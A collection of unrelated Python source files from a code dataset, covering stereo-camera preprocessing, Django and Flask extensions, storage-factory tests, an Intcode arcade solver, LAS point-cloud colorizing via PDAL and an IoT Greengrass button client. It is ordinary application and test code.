self.save_image(raw_frame, "raw_frame")
#Crop frame
cropped_frame = preprocessing.crop(raw_frame, StereoConfig.crop_topleft, StereoConfig.crop_bottomright)
self.save_image(cropped_frame, "cropped_frame")
#Distance crop
distance_cropped_frame = preprocessing.distance_crop(cropped_frame, StereoConfig.dist_crop_min, StereoConfig.dist_crop_max)
self.save_image(distance_cropped_frame, "distance_cropped_frame")
#Remove disconnected masses
opened_frame = preprocessing.morph_open(distance_cropped_frame, StereoConfig.open_kernal_size)
self.save_image(opened_frame, "opened_frame")
#Fill holes in ball
closed_frame = preprocessing.morph_close(opened_frame, StereoConfig.close_kernal_size)
self.save_image(closed_frame, "closed_frame")
#Threshold to binary
thresholded_frame = preprocessing.stereo_threshold(closed_frame)
self.save_image(thresholded_frame, "thresholded_frame")
return thresholded_frame
def transform_camera_frame_to_world_frame(self, coordinate): #TODO
#RS local axes are defined with X right, Y down, Z towards facing direction.
#These need to be converted to the same axes as robot platform uses.
#X forward, Y left (TODO check positive value is left) and Z up
x_l = coordinate[2]/1000 #z_rs becomes x
y_l = -coordinate[0]/1000 #-x_rs becomes y
z_l = -coordinate[1]/1000 #-y_rs becomes z
rotaton_matrix = StereoConfig.rotation_matrix
x_rotated = x_l*rotaton_matrix[0][0]+y_l*rotaton_matrix[1][0]+z_l*rotaton_matrix[2][0]
y_rotated = x_l*rotaton_matrix[0][1]+y_l*rotaton_matrix[1][1]+z_l*rotaton_matrix[2][1]
z_rotated = x_l*rotaton_matrix[0][2]+y_l*rotaton_matrix[1][2]+z_l*rotaton_matrix[2][2]
x_translated = x_rotated-StereoConfig.camera_position[0]
y_translated = y_rotated-StereoConfig.camera_position[1]
z_translated = z_rotated-StereoConfig.camera_position[2]
world_coord = [x_translated, y_translated, z_translated]
#print(f"Coord: {[x_l, y_l, z_l]}, {world_coord:}")
#print(f"{x_translated:3f},{y_translated:3f},{z_translated:3f}")
return world_coord
def record_singe_image_set(self):
self.debug_type = "oneshot"
self.debug_mode = True
def save_image(self, frame, image_name): #TODO async func to save images to a file
#needs to set filename based on image id at start to ensure it has not been updated.
if frame is not False and image_name == "thresholded_frame":
self.debug_frame_output = frame
return
def test_publisher_pixel_coordinate(stereo: Stereo):
"""Test file that saves coords to a json file for testing with traj predictor"""
filename = "vision/log/coords.json"
if stereo.coord is not None:
with open(filename, "r+") as file:
try:
data = json.load(file)
except:
data = []
data.append(stereo.coord)
file.seek(0)
json.dump(data, file)
return
if __name__ == "__main__":
stereo = Stereo(test_publisher_pixel_coordinate)
stereo.debug_mode = True
stereo.debug_type = "cont"
stereo.start_loop()
time.sleep(2)
while True:
cv2.imshow("Colour Image", stereo.debug_frame_output)
# Press q if you want to end the loop
if cv2.waitKey(1) & 0xFF == ord('q'):
break
stereo.loop_running = False
| 1.945313 | 2 |
django_discord_connector/admin.py | DubClub-win/django-discord-connector | 2 | 48004 | <gh_stars>1-10
from django.contrib import admin
from django_discord_connector.models import DiscordClient, DiscordToken, DiscordGroup, DiscordChannel, DiscordUser
from django_discord_connector.tasks import sync_discord_groups
from django.apps import apps
def update_discord_groups(modeladmin, request, queryset):
sync_discord_groups()
update_discord_groups.short_description="Update Discord groups from Discord Server"
# Register your models here.
admin.site.register(DiscordGroup)
admin.site.register(DiscordChannel)
admin.site.register(DiscordUser)
if apps.is_installed('django_singleton_admin'):
# Highly Recommended: https://github.com/porowns/django-singleton-admin
from django_singleton_admin.admin import DjangoSingletonModelAdmin
@admin.register(DiscordClient)
class DiscordClientAdmin(DjangoSingletonModelAdmin):
fieldsets = (
('General Settings', {
'fields': ('callback_url', 'server_id', 'client_id', 'client_secret', 'bot_token', 'invite_link', 'name_enforcement_schema')
}),
('Advanced Settings', {
'classes': ('collapse', 'open'),
'fields': ('api_endpoint', 'base_uri', 'token_uri', 'token_revoke_uri')
}),
) | 1.390625 | 1 |
tests/test_store_creation.py | bjoernmeier/storefact | 16 | 48132 | <gh_stars>10-100
from storefact._store_creation import create_store
import pytest
def test_create_store_azure(mocker):
# Mock HAzureBlockBlobStore also here, becase otherwise it will try to inherit from
# the mock object `mock_azure` created below, which will fail.
mock_hazure = mocker.patch("storefact._hstores.HAzureBlockBlobStore")
mock_azure = mocker.patch("simplekv.net.azurestore.AzureBlockBlobStore")
create_store(
"azure",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
},
)
mock_azure.assert_called_once_with(
checksum=True,
conn_string="DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY",
container="cont_name",
create_if_missing=True,
max_connections=2,
public=False,
socket_timeout=(20, 100),
max_block_size=4194304,
max_single_put_size=67108864,
)
mock_hazure.assert_not_called()
def test_create_store_hazure(mocker):
mock_hazure = mocker.patch("storefact._hstores.HAzureBlockBlobStore")
create_store(
"hazure",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
},
)
mock_hazure.assert_called_once_with(
checksum=True,
conn_string="DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY",
container="cont_name",
create_if_missing=True,
max_connections=2,
public=False,
socket_timeout=(20, 100),
max_block_size=4194304,
max_single_put_size=67108864,
)
def test_create_store_azure_inconsistent_params():
with pytest.raises(
Exception, match="create_if_missing is incompatible with the use of SAS tokens"
):
create_store(
"hazure",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
"use_sas": True,
},
)
def test_create_store_hs3(mocker):
mock_hs3 = mocker.patch("storefact._boto._get_s3bucket")
mock_hbotostores = mocker.patch("storefact._hstores.HBotoStore")
create_store(
"hs3",
{
'host': u'endpoint:1234',
'access_key': u'access_key',
'secret_key': u'secret_key',
'bucket': u'bucketname',
},
)
mock_hs3.assert_called_once_with(
host=u'endpoint:1234',
access_key=u'access_key',
secret_key=u'secret_key',
bucket=u'bucketname',
)
def test_create_store_s3(mocker):
mock_s3 = mocker.patch("storefact._boto._get_s3bucket")
mock_hbotostores = mocker.patch("storefact._hstores.HBotoStore")
create_store(
"s3",
{
'host': u'endpoint:1234',
'access_key': u'access_key',
'secret_key': u'secret_key',
'bucket': u'bucketname',
},
)
mock_s3.assert_called_once_with(
host=u'endpoint:1234',
access_key=u'access_key',
secret_key=u'secret_key',
bucket=u'bucketname',
)
def test_create_store_hfs(mocker):
mock_hfs = mocker.patch("storefact._hstores.HFilesystemStore")
create_store(
"hfs",
{
'type': 'hfs',
'path': 'this/is/a/relative/path',
'create_if_missing': True
},
)
mock_hfs.assert_called_once_with('this/is/a/relative/path')
@pytest.mark.skip(reason="some issue here")
def test_create_store_fs(mocker):
mock_fs = mocker.patch("simplekv.fs.FilesystemStore")
create_store(
"fs",
{
'type': 'fs',
'path': 'this/is/a/relative/fspath',
'create_if_missing': True
}
)
mock_fs.assert_called_once_with('this/is/a/relative/fspath')
def test_create_store_mem(mocker):
mock_mem = mocker.patch("simplekv.memory.DictStore")
create_store(
"memory",
{'type': u'memory', 'wrap': u'readonly'},
)
mock_mem.assert_called_once_with()
def test_create_store_hmem(mocker):
mock_hmem = mocker.patch("storefact._hstores.HDictStore")
create_store(
"hmemory",
{'type': u'memory', 'wrap': u'readonly'},
)
mock_hmem.assert_called_once_with()
@pytest.mark.skip(reason="some issue here")
def test_create_store_redis(mocker):
mock_redis = mocker.patch("simplekv.memory.redisstore.RedisStore")
mock_Strictredis = mocker.patch("redis.StrictRedis")
create_store(
"redis",
{'type': u'redis', 'host': u'localhost', 'db': 2},
)
mock_Strictredis.assert_called_once_with()
def test_create_store_valueerror():
with pytest.raises(
Exception, match="Unknown store type: ABC"
):
create_store(
"ABC",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
"use_sas": True,
},
)
| 1.523438 | 2 |
day13/main.py | Floozutter/aoc-2019-speedrun | 0 | 48260 | INPUTPATH = "input.txt"
#INPUTPATH = "input-test.txt"
with open(INPUTPATH) as ifile:
raw = ifile.read()
program = tuple(map(int, raw.strip().split(",")))
from enum import Enum
class Mde(Enum):
POS = 0
IMM = 1
REL = 2
from itertools import chain, repeat, islice
from collections import defaultdict
from typing import Dict, Callable, List, Iterable, Optional, ClassVar
class Ico:
liv: bool
ptr: int
reb: int
mem: Dict[int, int]
cal: Callable[[], int]
log: List[int]
def __init__(
self,
prg: Iterable[int],
cal: Callable[[], int] = lambda: 0
) -> None:
self.liv = True
self.ptr = 0
self.reb = 0
self.mem = defaultdict(int, enumerate(prg))
self.cal = cal
self.log = list()
def get(self, mde: Mde) -> int:
if mde == Mde.POS: idx = self.mem[self.ptr]
elif mde == Mde.IMM: idx = self.ptr
elif mde == Mde.REL: idx = self.mem[self.ptr] + self.reb
self.ptr += 1
return idx
def ste(self) -> int:
if not self.liv: return 99
val = self.mem[self.get(Mde.IMM)]
opc = val % 100
mds = map(Mde, chain(map(int, reversed(str(val // 100))), repeat(0)))
opr = self.ops[opc]
opr(self, *map(self.get, islice(mds, opr.__code__.co_argcount - 1)))
return opc
def run(self) -> List[int]:
while self.liv: self.ste()
return self.log
def add(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = self.mem[idx] + self.mem[jdx]
def mul(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = self.mem[idx] * self.mem[jdx]
def inp(self, idx: int) -> None:
self.mem[idx] = self.cal()
def out(self, idx: int) -> None:
self.log.append(self.mem[idx])
def jit(self, idx: int, jdx: int) -> None:
if self.mem[idx]: self.ptr = self.mem[jdx]
def jif(self, idx: int, jdx: int) -> None:
if not self.mem[idx]: self.ptr = self.mem[jdx]
def les(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = int(self.mem[idx] < self.mem[jdx])
def equ(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = int(self.mem[idx] == self.mem[jdx])
def adj(self, idx: int) -> None:
self.reb += self.mem[idx]
def hal(self) -> None:
self.liv = False
ops: ClassVar[Dict[int, Callable[..., None]]] = {
1: add,
2: mul,
3: inp,
4: out,
5: jit,
6: jif,
7: les,
8: equ,
9: adj,
99: hal
}
from typing import Tuple
class ArcadeCabinet:
ico: Ico
index: int
screen: Dict[Tuple[int, int], int]
score: int
auto: bool
tile_to_char: ClassVar[Dict[int, str]] = {
0: " ",
1: "|",
2: "#",
3: "_",
4: "o"
}
char_to_joystick: ClassVar[Dict[str, int]] = {
"a": -1,
"s": 0,
"d": 1
}
def __init__(self, program: Iterable[int], auto: bool = True) -> None:
self.ico = Ico(program)
self.ico.cal = self
self.index = 0
self.screen = defaultdict(int)
self.score = 0
self.auto = auto
def __call__(self) -> int:
self.consume_log()
if self.auto:
return 0
else:
return self.prompt_joystick()
def __str__(self) -> str:
indexes, jndexes = zip(*self.screen)
return "\n".join(
"".join(
self.tile_to_char[self.screen[i, j]]
for j in range(min(jndexes), max(jndexes) + 1)
)
for i in range(min(indexes), max(indexes) + 1)
)
def run(self) -> None:
self.ico.run()
self.consume_log()
def consume_log(self) -> None:
while self.index < len(self.ico.log):
j, i, value = self.ico.log[self.index: self.index + 3]
if (j, i) == (-1, 0): self.score = value
else: self.screen[i, j] = value
self.index += 3
def prompt_joystick(self) -> int:
print(self)
msg = f"<{'|'.join(self.char_to_joystick)}>: "
while (j := self.char_to_joystick.get(input(msg))) is None: pass
return j
demo = ArcadeCabinet(program)
demo.run()
print(sum(1 for tile in demo.screen.values() if tile == 2))
game = ArcadeCabinet((2,) + program[1:], False)
game.run()
print(game.score)
| 2.09375 | 2 |
tests/test_cdn.py | datalogics-cgreen/server_core | 0 | 48388 | # encoding: utf-8
from nose.tools import (
eq_,
set_trace,
)
from util.cdn import cdnify
class TestCDN(object):
def unchanged(self, url, cdns):
self.ceq(url, url, cdns)
def ceq(self, expect, url, cdns):
eq_(expect, cdnify(url, cdns))
def test_no_cdns(self):
url = "http://foo/"
self.unchanged(url, None)
def test_non_matching_cdn(self):
url = "http://foo.com/bar"
self.unchanged(url, {"bar.com" : "cdn.com"})
def test_matching_cdn(self):
url = "http://foo.com/bar#baz"
self.ceq("https://cdn.org/bar#baz", url,
{"foo.com" : "https://cdn.org",
"bar.com" : "http://cdn2.net/"}
)
def test_s3_bucket(self):
# Instead of the foo.com URL we accidentally used the full S3
# address for the bucket that hosts S3. cdnify() handles this
# with no problem.
url = "http://s3.amazonaws.com/foo.com/bar#baz"
self.ceq("https://cdn.org/bar#baz", url,
{"foo.com" : "https://cdn.org/"})
def test_relative_url(self):
# By default, relative URLs are untouched.
url = "/groups/"
self.unchanged(url, {"bar.com" : "cdn.com"})
# But if the CDN list has an entry for the empty string, that
# URL is used for relative URLs.
self.ceq("https://cdn.org/groups/", url,
{"" : "https://cdn.org/"})
| 1.75 | 2 |
test/_test_sample_z.py | yiruiliu110/eegnn | 0 | 48516 | <reponame>yiruiliu110/eegnn
import torch
from torch.distributions import Gamma, Dirichlet
from estimation import compute_z
i = [[0, 1, 1, 2],
[2, 0, 2, 1]]
v_graph = [1, 1, 1, 1]
v_c = [0, 1, 1, 0]
graph = torch.sparse_coo_tensor(i, v_graph, (3, 3))
c = torch.sparse_coo_tensor(i, v_c, (3, 3))
max_K = 10
node_number = 4
w = Gamma(concentration=1., rate=1.).sample([max_K, node_number]) * 5.0
pi = Dirichlet(torch.tensor([0.5, 0.5])).sample()
z = compute_z(w, pi, c)
print(z) | 1.445313 | 1 |
pyneos/mypaths.py | kavehshamsi/neos | 0 | 48644 | <filename>pyneos/mypaths.py
import os
home_dir = os.path.expanduser('~')
neos_dir = '.' # have this point to your neos directory
neos_cmd = neos_dir + '/bin/neos'
abc_cmd = neos_dir + '/bin/abc'
abclib_path = neos_dir + '/cells/simpler.lib'
neos_bench_dir = neos_dir + '/bench/'
| 0.8125 | 1 |
SuperSafety/Utils/utils.py | BDEvan5/SuperSafety | 0 | 48772 | <reponame>BDEvan5/SuperSafety
import yaml
import csv
import os
from argparse import Namespace
import shutil
import numpy as np
from numba import njit
# Admin functions
def save_conf_dict(dictionary, save_name=None):
if save_name is None:
save_name = dictionary["agent_name"]
path = dictionary["vehicle_path"] + dictionary["agent_name"] + f"/{save_name}_record.yaml"
with open(path, 'w') as file:
yaml.dump(dictionary, file)
def load_conf(fname):
full_path = "config/" + fname + '.yaml'
with open(full_path) as file:
conf_dict = yaml.load(file, Loader=yaml.FullLoader)
conf = Namespace(**conf_dict)
# np.random.seed(conf.random_seed)
return conf
def load_yaml_dict(fname):
full_path = "config/" + fname + '.yaml'
with open(full_path) as file:
conf_dict = yaml.load(file, Loader=yaml.FullLoader)
return conf_dict
def init_file_struct(path):
if os.path.exists(path):
try:
os.rmdir(path)
except:
shutil.rmtree(path)
os.mkdir(path)
@njit(cache=True)
def limit_phi(phi):
while phi > np.pi:
phi = phi - 2*np.pi
while phi < -np.pi:
phi = phi + 2*np.pi
return phi
| 1.59375 | 2 |
flask_transalchemy/core.py | gerelorant/Flask-TransAlchemy | 2 | 48900 | from flask import Flask, current_app, request
from flask_babelex import get_locale
from flask_sqlalchemy import SQLAlchemy
from flask_transalchemy.model import TranslationMixin
class TransAlchemy(object):
"""Flask-TransAlchemy extension class.
:param app: Flask application instance
:param db: Flask-SQLAlchemy instance
"""
def __init__(self, app: Flask, db: SQLAlchemy, label_route: str = None):
self.app = app
self.db = db
self.model = None
self.route = label_route
if app is not None:
self.init_app(app)
def init_app(self, app: Flask):
"""Initialize extension and create `Translation` model class.
:param app: Flask application instance
"""
app.extensions["babel_alchemy"] = self
class Translation(self.db.Model, TranslationMixin):
pass
self.model = Translation
if self.route:
@self.app.route(
'/{}/<label>'.format(self.route),
endpoint='label_translations'
)
def translate(label):
return self.get_label(label, **request.args)
def set_label(self, label: str, value: str, language: str = None):
"""Save label translation in database.
:param label: Label name ('attribute' field in table)
:param value: Translated label text.
:param language: Language of translation
"""
if language is None:
language = str(get_locale())
translation = self.model(
attribute=label,
language=language,
value=value
)
self.db.session.add(translation)
self.db.session.commit()
def get_label(self, label: str, language: str = None):
"""Get translated label from database.
Labels are stored in the table without table name and record_id.
:param label: Label name ('attribute' field in table)
:param language: Language of translation
:return: Translated label text.
"""
if language is None:
language = str(get_locale())
qry = self.model.query.filter_by(
table=None,
record_id=None,
attribute=label,
language=language
)
translation = qry.first()
if translation is None:
return label
return translation.value
def set_label(label: str, value: str, language: str = None):
"""Shortcut for `BabelAlchemy.set_label()`.
:param label: Label name ('attribute' field in table)
:param value: Translated label text.
:param language: Language of translation
"""
babel_alchemy = current_app.extensions.get("babel_alchemy")
return babel_alchemy.set_label(label, value, language)
def get_label(label: str, language: str = None):
"""Shortcut for `BabelAlchemy.get_label()`.
Labels are stored in the table without table name and record_id.
:param label: Label name ('attribute' field in table)
:param language: Language of translation
:return: Translated label text.
"""
babel_alchemy = current_app.extensions.get("babel_alchemy")
return babel_alchemy.get_label(label, language)
| 1.65625 | 2 |
temp-down/application.py | scavicchio/easyWaltonTracker | 2 | 49028 | from flask import Flask, render_template, request, url_for, redirect
application = app = Flask(__name__)
@app.before_request
def check_for_maintenance():
if request.path != url_for('maintenance'):
return redirect(url_for('maintenance'))
# Or alternatively, dont redirect
# return 'Sorry, off for maintenance!', 503
@app.route('/maintenance')
def maintenance():
return render_template('downsite.html')
# run the app.
if __name__ == "__main__":
# Setting debug to True enables debug output. This line should be
# removed before deploying a production app.
app.run(0.0.0.0,port=8080,debug=True) | 1.40625 | 1 |
scripts/colorize/las_colorize.py | SPINLab/rijkswaterstaat-data-tools | 1 | 49156 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Python3
@author: <NAME>
"""
import sys
import os
import argparse
import subprocess
import json
import math
def run_pdal(path, input_path, output_path, las_srs, wms_url,
wms_layer, wms_srs, wms_version, wms_format, wms_ppm,
wms_max_image_size):
subprocess.call(['pdal', 'pipeline',
'{}/pdal_pipeline.json'.format(path),
'--readers.las.filename={}'.format(input_path),
'--filters.python.script={}/pdal_colorize.py'.format(path),
('--filters.python.pdalargs="{' +
'\\\"wms_url\\\": \\\"{}\\\",'.format(wms_url) +
'\\\"wms_layer\\\": \\\"{}\\\",'.format(wms_layer) +
'\\\"wms_srs\\\": \\\"{}\\\",'.format(wms_srs) +
'\\\"wms_version\\\": \\\"{}\\\",'.format(wms_version) +
'\\\"wms_format\\\": \\\"{}\\\",'.format(wms_format) +
'\\\"wms_ppm\\\": \\\"{}\\\",'.format(wms_ppm) +
'\\\"wms_max_image_size\\\": \\\"{}\\\"}}"'.format(wms_max_image_size)),
'--writers.las.filename={}'.format(output_path),
'--writers.las.a_srs={}'.format(las_srs)])
def process_files(input_path, output_path, las_srs,
wms_url, wms_layer, wms_srs,
wms_version, wms_format, wms_ppm,
wms_max_image_size, verbose=False):
"""
Run the pdal pipeline using the given arguments.
Parameters
----------
input : str
The path to the input LAS/LAZ file.
output : str
The path to the output LAS/LAZ file.
"""
path = os.path.dirname(os.path.realpath(__file__))
if os.path.isdir(input_path):
for i, f in enumerate(os.listdir(input_path)):
if f.endswith(".las") or f.endswith(".laz"):
las = os.path.join(input_path, f).replace('\\', '/')
if os.path.isdir(output_path):
output_path = output_path + '/' if output_path[-1] != '/' else output_path
basename, ext = os.path.splitext(f)
out = '{}{}_color{}'.format(output_path, basename, ext)
else:
basename, ext = os.path.splitext(output_path)
out = '{}_{}{}'.format(basename, i, ext)
if verbose:
print('Colorizing {} ..'.format(las))
run_pdal(path, las, out, las_srs, wms_url, wms_layer, wms_srs,
wms_version, wms_format, wms_ppm, wms_max_image_size)
else:
if verbose:
print('Colorizing {} ..'.format(input_path))
run_pdal(path, input_path, output_path, las_srs, wms_url, wms_layer,
wms_srs, wms_version, wms_format, wms_ppm, wms_max_image_size)
def argument_parser():
"""
Define and return the arguments.
"""
description = ("Colorize a las or laz file with a WMS service. "
"By default uses PDOK aerial photography.")
parser = argparse.ArgumentParser(description=description)
required_named = parser.add_argument_group('required named arguments')
required_named.add_argument('-i', '--input',
help='The input LAS/LAZ file or folder.',
required=True)
required_named.add_argument('-o', '--output',
help='The output colorized LAS/LAZ file or folder.',
required=True)
parser.add_argument('-s', '--las_srs',
help='The spatial reference system of the LAS data. (str, default: EPSG:28992)',
required=False,
default='EPSG:28992')
parser.add_argument('-w', '--wms_url',
help='The url of the WMS service to use. (str, default: https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wms?)',
required=False,
default='https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wms?')
parser.add_argument('-l', '--wms_layer',
help='The layer of the WMS service to use. (str, default: Actueel_ortho25)',
required=False,
default='Actueel_ortho25')
parser.add_argument('-r', '--wms_srs',
help='The spatial reference system of the WMS data to request. (str, default: EPSG:28992)',
required=False,
default='EPSG:28992')
parser.add_argument('-f', '--wms_format',
help='The image format of the WMS data to request. (str, default: image/png)',
required=False,
default='image/png')
parser.add_argument('-v', '--wms_version',
help='The version number of the WMS service. (str, default: 1.3.0)',
required=False,
default='1.3.0')
parser.add_argument('-p', '--wms_ppm',
help='The approximate desired pixels per meter of the requested image. (int, default: 4)',
required=False,
default=4)
parser.add_argument('-m', '--wms_max_image_size',
help='The maximum size in pixels of the largest side of the requested image. (int, default: sys.maxsize)',
required=False,
default=sys.maxsize)
parser.add_argument('-V', '--verbose', default=False, action="store_true",
help='Set verbose.')
args = parser.parse_args()
return args
def main():
args = argument_parser()
process_files(args.input, args.output, args.las_srs,
args.wms_url, args.wms_layer, args.wms_srs,
args.wms_version, args.wms_format,
args.wms_ppm, args.wms_max_image_size,
args.verbose)
if __name__ == '__main__':
main()
| 1.554688 | 2 |
astroutils/writer_module.py | nithyanandan/AstroUtils | 1 | 49284 | from blessings import Terminal
term = Terminal()
class Writer(object):
"""
---------------------------------------------------------------------------
Create an object with a write method that writes to a
specific place on the screen, defined at instantiation.
This is the glue between blessings and progressbar.
---------------------------------------------------------------------------
"""
def __init__(self, location):
"""
-----------------------------------------------------------------------
Input: location - tuple of ints (x, y), the position
of the bar in the terminal
-----------------------------------------------------------------------
"""
self.location = location
def write(self, string):
with term.location(*self.location):
print(string)
| 2.125 | 2 |
{{cookiecutter.project_slug}}/tests/unit/{{cookiecutter.project_slug}}/graphql/resolvers/test_query.py | Maximilien-R/cookiecutter-tartiflette-aiohttp | 3 | 49412 | from unittest.mock import Mock
import pytest
from {{cookiecutter.project_slug}}.graphql.resolvers import resolve_query_hello
@pytest.mark.asyncio
async def test_resolve_query_hello():
result = await resolve_query_hello(
None, {"name": "{{cookiecutter.author_name}}"}, {}, Mock()
)
assert result == "Hello {{cookiecutter.author_name}}!"
| 1.1875 | 1 |
groups/master/ggd/button.py | awslabs/aws-greengrass-mini-fulfillment | 25 | 49540 | #!/usr/bin/env python
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License is
# located at
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
GGD Button
This GGD will send "green", "red", or "white" button messages.
"""
import os
import json
import time
import socket
import argparse
import datetime
import logging
from gpiozero import PWMLED, Button
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient, DROP_OLDEST
from AWSIoTPythonSDK.core.greengrass.discovery.providers import \
DiscoveryInfoProvider
import utils
from gg_group_setup import GroupConfigFile
dir_path = os.path.dirname(os.path.realpath(__file__))
log = logging.getLogger('button')
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s|%(name)-8s|%(levelname)s: %(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.INFO)
GGD_BUTTON_TOPIC = "button"
hostname = socket.gethostname()
green_led = PWMLED(4)
green_button = Button(5)
red_led = PWMLED(17)
red_button = Button(6)
white_led = PWMLED(27)
white_button = Button(13)
mqttc = None
ggd_name = None
def button(sensor_id, toggle):
now = datetime.datetime.now()
if toggle:
val = "on"
else:
val = "off"
msg = {
"version": "2017-07-05", # YYYY-MM-DD
"ggd_id": ggd_name,
"hostname": hostname,
"data": [
{
"sensor_id": sensor_id,
"ts": now.isoformat(),
"value": val
}
]
}
mqttc.publish(GGD_BUTTON_TOPIC, json.dumps(msg), 0)
return msg
def red_push():
msg = button(sensor_id="red-button", toggle=True)
log.info("[red_push] publishing button msg: {0}".format(msg))
red_led.on()
green_led.off()
red_led.pulse()
def red_release():
msg = button(sensor_id="red-button", toggle=False)
log.info("[red_release] publishing button msg: {0}".format(msg))
def green_push():
msg = button(sensor_id="green-button", toggle=True)
log.info("[green_push] publishing button msg: {0}".format(msg))
green_led.on()
red_led.off()
green_led.pulse()
def green_release():
msg = button(sensor_id="green-button", toggle=False)
log.info("[green_release] publishing button msg: {0}".format(msg))
def white_push():
msg = button(sensor_id="white-button", toggle=True)
log.info("[white_push] publishing button msg: {0}".format(msg))
white_led.pulse()
def white_release():
msg = button(sensor_id="white-button", toggle=False)
log.info("[white_release] publishing button msg: {0}".format(msg))
white_led.on()
def use_box(cli):
log.info("[use_box] configuring magic buttons.")
red_button.when_pressed = red_push
red_button.when_released = red_release
green_button.when_pressed = green_push
green_button.when_released = green_release
white_button.when_pressed = white_push
white_button.when_released = white_release
white_led.on()
log.info("[use_box] configured buttons. White LED should now be on.")
try:
while 1:
time.sleep(0.2)
except KeyboardInterrupt:
log.info(
"[use_box] KeyboardInterrupt ... exiting box monitoring loop")
red_led.off()
green_led.off()
white_led.off()
def button_green(cli):
if cli.light:
green_led.on()
msg = button(sensor_id="green-button", toggle=cli.toggle)
print("[cli.button_green] publishing button msg: {0}".format(msg))
def button_red(cli):
if cli.light:
red_led.on()
msg = button(sensor_id="red-button", toggle=cli.toggle)
print("[cli.button_red] publishing button msg: {0}".format(msg))
def button_white(cli):
if cli.light:
white_led.on()
msg = button(sensor_id="white-button", toggle=cli.toggle)
print("[cli.button_white] publishing button msg: {0}".format(msg))
def core_connect(device_name, config_file, root_ca, certificate, private_key,
group_ca_path):
global ggd_name, mqttc
cfg = GroupConfigFile(config_file)
ggd_name = cfg['devices'][device_name]['thing_name']
iot_endpoint = cfg['misc']['iot_endpoint']
dip = DiscoveryInfoProvider()
dip.configureEndpoint(iot_endpoint)
dip.configureCredentials(
caPath=root_ca, certPath=certificate, keyPath=private_key
)
dip.configureTimeout(10) # 10 sec
logging.info("[button] Discovery using CA:{0} cert:{1} prv_key:{2}".format(
root_ca, certificate, private_key
))
gg_core, discovery_info = utils.discover_configured_core(
device_name=device_name, dip=dip, config_file=config_file,
)
if not gg_core:
raise EnvironmentError("[button] Couldn't find the Core")
ca_list = discovery_info.getAllCas()
group_id, ca = ca_list[0]
group_ca_file = utils.save_group_ca(ca, group_ca_path, group_id)
mqttc = AWSIoTMQTTClient(ggd_name)
# local Greengrass Core discovered, now connect to Core from this Device
log.info("[button] gca_file:{0} cert:{1}".format(
group_ca_file, certificate))
mqttc.configureCredentials(group_ca_file, private_key, certificate)
mqttc.configureOfflinePublishQueueing(10, DROP_OLDEST)
return mqttc, gg_core
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Mini Fulfillment GGD and CLI button',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('device_name',
help="The GGD device_name in the config file.")
parser.add_argument('config_file',
help="The config file.")
parser.add_argument('root_ca',
help="Root CA File Path of Cloud Server Certificate.")
parser.add_argument('certificate',
help="File Path of GGD Certificate.")
parser.add_argument('private_key',
help="File Path of GGD Private Key.")
parser.add_argument('group_ca_path',
help="The directory path where the discovered Group CA "
"will be saved.")
subparsers = parser.add_subparsers()
box_parser = subparsers.add_parser(
'box', description='Use the physical button box to drive.')
box_parser.add_argument('--on', action='store_true',
help="Toggle box ON")
box_parser.set_defaults(func=use_box, on=True)
green_parser = subparsers.add_parser(
'green',
description='Virtual GREEN button pushed')
green_parser.add_argument('--on', dest='toggle', action='store_true',
help="Virtual toggle ON")
green_parser.add_argument('--off', dest='toggle', action='store_false',
help="Virtual toggle OFF")
green_parser.add_argument('--light', action='store_true')
green_parser.set_defaults(func=button_green, toggle=True)
red_parser = subparsers.add_parser(
'red',
description='Virtual RED button pushed')
red_parser.add_argument('--on', dest='toggle', action='store_true',
help="Virtual toggle ON")
red_parser.add_argument('--off', dest='toggle', action='store_false',
help="Virtual toggle OFF")
red_parser.add_argument('--light', action='store_true')
red_parser.set_defaults(func=button_red, toggle=True)
white_parser = subparsers.add_parser(
'white',
description='Virtual WHITE button toggled')
white_parser.add_argument('--on', dest='toggle', action='store_true',
help="Virtual toggle ON")
white_parser.add_argument('--off', dest='toggle', action='store_false',
help="Virtual toggle OFF")
white_parser.add_argument('--light', action='store_true')
white_parser.set_defaults(func=button_white, toggle=True)
pa = parser.parse_args()
client, core = core_connect(
device_name=pa.device_name,
config_file=pa.config_file, root_ca=pa.root_ca,
certificate=pa.certificate, private_key=pa.private_key,
group_ca_path=pa.group_ca_path
)
if utils.mqtt_connect(mqtt_client=client, core_info=core):
pa.func(pa)
time.sleep(0.5)
mqttc.disconnect()
time.sleep(1)
| 1.46875 | 1 |
megastone/rsp/server.py | giltom/megastone | 2 | 49668 | from megastone.util import round_up
import threading
import logging
import io
import enum
import dataclasses
import abc
from megastone.errors import UnsupportedError
from megastone.mem import SegmentMemory, MemoryAccessError
from megastone.debug import Debugger, StopReason, StopType, HookType, CPUError, InvalidInsnError, MemFaultError
from .connection import RSPConnection, Signal, parse_ascii, parse_hex_int, parse_hexint_list, parse_list, encode_hex, parse_hex, ParsingError
from .stream import EndOfStreamError, TCPStreamServer
from .target import load_gdb_regs
logger = logging.getLogger(__name__)
